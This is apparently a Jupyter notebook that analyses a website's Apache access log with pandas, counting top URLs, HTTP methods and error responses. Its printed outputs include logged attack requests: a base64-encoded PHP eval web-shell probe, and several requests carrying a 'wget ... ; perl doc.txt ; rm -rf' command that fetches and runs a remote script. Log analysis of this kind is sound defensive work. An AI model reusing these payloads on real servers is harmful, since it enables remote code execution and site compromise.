In [1]:
import pandas as pd

In [2]:
names=["ip", "1", "2", "3", "4", "url", "status", "size", "5", "6", "7"]
df3 = pd.read_csv("access.log", sep=" ", usecols= range(11), low_memory=False, header=None, names=names)

In [3]:
df3

,ip,1,2,3,4,url,status,size,5,6,7
0,134.249.53.185,-,-,[27/May/2016:03:32:09,+0200],POST http://almhuette-raith.at/administrator/i...,200,4498,-,-,-
1,134.249.53.185,-,-,[27/May/2016:03:32:09,+0200],GET http://almhuette-raith.at/administrator/in...,200,4267,-,-,-
2,134.249.53.185,-,-,[27/May/2016:03:32:13,+0200],GET http://almhuette-raith.at/administrator/in...,200,4238,-,-,-
3,134.249.53.185,-,-,[27/May/2016:03:32:13,+0200],POST http://almhuette-raith.at/administrator/i...,200,4498,-,-,-
4,134.249.53.185,-,-,[27/May/2016:03:32:14,+0200],GET http://almhuette-raith.at/administrator/in...,200,4267,-,-,-
...,...,...,...,...,...,...,...,...,...,...,...
225128,149.56.83.40,-,-,[08/Feb/2017:10:35:05,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-
225129,149.56.83.40,-,-,[08/Feb/2017:10:35:06,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-
225130,149.56.83.40,-,-,[08/Feb/2017:10:35:07,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-
225131,149.56.83.40,-,-,[08/Feb/2017:10:35:07,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-
225132,149.56.83.40,-,-,[08/Feb/2017:10:35:08,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-

In [4]:
df4 = pd.concat([df3.iloc[:,0],df3.iloc[:,4:]], axis=1)
df4

,ip,4,url,status,size,5,6,7
0,134.249.53.185,+0200],POST http://almhuette-raith.at/administrator/i...,200,4498,-,-,-
1,134.249.53.185,+0200],GET http://almhuette-raith.at/administrator/in...,200,4267,-,-,-
2,134.249.53.185,+0200],GET http://almhuette-raith.at/administrator/in...,200,4238,-,-,-
3,134.249.53.185,+0200],POST http://almhuette-raith.at/administrator/i...,200,4498,-,-,-
4,134.249.53.185,+0200],GET http://almhuette-raith.at/administrator/in...,200,4267,-,-,-
...,...,...,...,...,...,...,...,...
225128,149.56.83.40,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-
225129,149.56.83.40,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-
225130,149.56.83.40,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-
225131,149.56.83.40,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-
225132,149.56.83.40,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-

In [5]:
df4.shape[0]

225133

In [58]:
df_urls = pd.DataFrame(df4.iloc[:,2])
df_urls

                                                      url
0       POST http://almhuette-raith.at/administrator/i...
1       GET http://almhuette-raith.at/administrator/in...
2       GET http://almhuette-raith.at/administrator/in...
3       POST http://almhuette-raith.at/administrator/i...
4       GET http://almhuette-raith.at/administrator/in...
...                                                   ...
225128             POST /administrator/index.php HTTP/1.1
225129             POST /administrator/index.php HTTP/1.1
225130             POST /administrator/index.php HTTP/1.1
225131             POST /administrator/index.php HTTP/1.1
225132             POST /administrator/index.php HTTP/1.1

[225133 rows x 1 columns]

In [60]:
df_urls["cnt"] = 0
df_urls2 = df_urls.copy()
df_urls2["url_without_params"] = df_urls.apply (lambda row: row["url"].split()[1], axis=1)
del df_urls2["url"]
df_urls_g = df_urls2.groupby(by=["url_without_params"], as_index=False).count()
df_top_10 = df_urls_g.sort_values("cnt", ascending=False).head(10)
print(df_top_10.to_string(index=False))
# df_urls_g.head(10)

                               url_without_params    cnt
                         /administrator/index.php 103932
                           /apache-log/access.log  26336
                                                /   6940
               /templates/_system/css/general.css   4980
                                      /robots.txt   3199
http://almhuette-raith.at/administrator/index.php   2356
                                     /favicon.ico   2201
                                    /wp-login.php   1644
                                  /administrator/   1563
             /templates/jp_hotel/css/template.css   1287

In [8]:
df5 = df4
# df5["method"] = df5["4"].split()[0]
df5["method"] = 0
df5["method"] = df5.apply (lambda row: row["url"].split()[0], axis=1)
df5

,ip,4,url,status,size,5,6,7,method
0,134.249.53.185,+0200],POST http://almhuette-raith.at/administrator/i...,200,4498,-,-,-,POST
1,134.249.53.185,+0200],GET http://almhuette-raith.at/administrator/in...,200,4267,-,-,-,GET
2,134.249.53.185,+0200],GET http://almhuette-raith.at/administrator/in...,200,4238,-,-,-,GET
3,134.249.53.185,+0200],POST http://almhuette-raith.at/administrator/i...,200,4498,-,-,-,POST
4,134.249.53.185,+0200],GET http://almhuette-raith.at/administrator/in...,200,4267,-,-,-,GET
...,...,...,...,...,...,...,...,...,...
225128,149.56.83.40,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-,POST
225129,149.56.83.40,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-,POST
225130,149.56.83.40,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-,POST
225131,149.56.83.40,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-,POST
225132,149.56.83.40,+0100],POST /administrator/index.php HTTP/1.1,200,4498,-,-,-,POST

In [32]:
df_methods = pd.DataFrame(df5["method"])
df_methods["cnt"] = 0
df_meths = df_methods.groupby(by=["method"], as_index=False).count()
# print(df_meths)
df_m_normal = df_meths.loc[(df_meths["method"].astype('str').str.len() < 10)]
print(df_m_normal.to_string(index=False))

method    cnt
   GET 122095
  HEAD    528
  POST 102503
   PUT      6

In [33]:
df_m_unnormal = df_meths.loc[(df_meths["method"].astype('str').str.len() >= 10)]
print(df_m_unnormal.to_string(index=False))

                                                                                                                                                                                                                                                                           method  cnt
g369g=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOztlY2hvKCJlNTBiNWYyYjRmNjc1NGFmMDljYzg0NWI4YjU4ZTA3NiIpOztlY2hvKCJ8PC0iKTs7ZGllKCk7GET    1

In [51]:
df_4xx = df4.query("status >= 400 and status < 500").iloc[:,[0,2,3,4]].sort_values("size", ascending=False).head(5)
print(df_4xx.to_string(index=False))

            ip                                                                                                                                                                                                                                                                                                                                                                                                                                                   url  status size
164.132.159.94                                                                                                                                                                                                    GET /index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D50%26Itemid%3D56&amp;sa=U&amp;ved=0ahUKEwi42O_M_8TNAhWFXhoKHYc8DE043gIQFgi1ATAd&amp;usg=AFQjCNESXAyEBT2Tm9HSkP0-zDYPtMGW1Q/images/com_adsmanager/ads/uploaded/index.inc.php HTTP/1.1     404  442
164.132.159.94 GET /index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D50%26Itemid%3D56&amp;sa=U&amp;ved=0ahUKEwi42O_M_8TNAhWFXhoKHYc8DE043gIQFgi1ATAd&amp;usg=AFQjCNESXAyEBT2Tm9HSkP0-zDYPtMGW1Q/images/com_adsmanager/ads/uploaded/index.inc.php?shxxx=wget%20http://www.fia.com.gr/wp-content/uploads/2010/doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc.* HTTP/1.1     404  442
164.132.159.94 GET /index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D50%26Itemid%3D56&amp;sa=U&amp;ved=0ahUKEwjLqNrK_8TNAhWTSxoKHYuUCm84rAIQFgi9AzBP&amp;usg=AFQjCNESXAyEBT2Tm9HSkP0-zDYPtMGW1Q/images/com_adsmanager/ads/uploaded/index.inc.php?shxxx=wget%20http://www.fia.com.gr/wp-content/uploads/2010/doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc.* HTTP/1.1     404  442
164.132.159.94                                                                                                                                                                                                    GET /index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D50%26Itemid%3D56&amp;sa=U&amp;ved=0ahUKEwjLqNrK_8TNAhWTSxoKHYuUCm84rAIQFgi9AzBP&amp;usg=AFQjCNESXAyEBT2Tm9HSkP0-zDYPtMGW1Q/images/com_adsmanager/ads/uploaded/index.inc.php HTTP/1.1     404  442
164.132.159.94      GET /index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D50%26Itemid%3D56&amp;sa=U&amp;ved=0ahUKEwi42O_M_8TNAhWFXhoKHYc8DE043gIQFgi1ATAd&amp;usg=AFQjCNESXAyEBT2Tm9HSkP0-zDYPtMGW1Q/images/com_adsmanager/ads/uploaded/petx.php?shxxx=wget%20http://www.fia.com.gr/wp-content/uploads/2010/doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc.* HTTP/1.1     404  437

In [63]:
df_5xx = df4.query("status >= 500 and status < 600").iloc[:,[0]]
df_5xx["cnt"] = 0
df_5xx_ans = df_5xx.groupby(by=["ip"], as_index=False).count().sort_values("cnt", ascending=False).head(5)
print(df_5xx_ans.to_string(index=False))

           ip  cnt
189.217.45.73  225
82.193.127.15    4
91.210.145.36    3
198.38.94.207    2
 194.87.237.6    2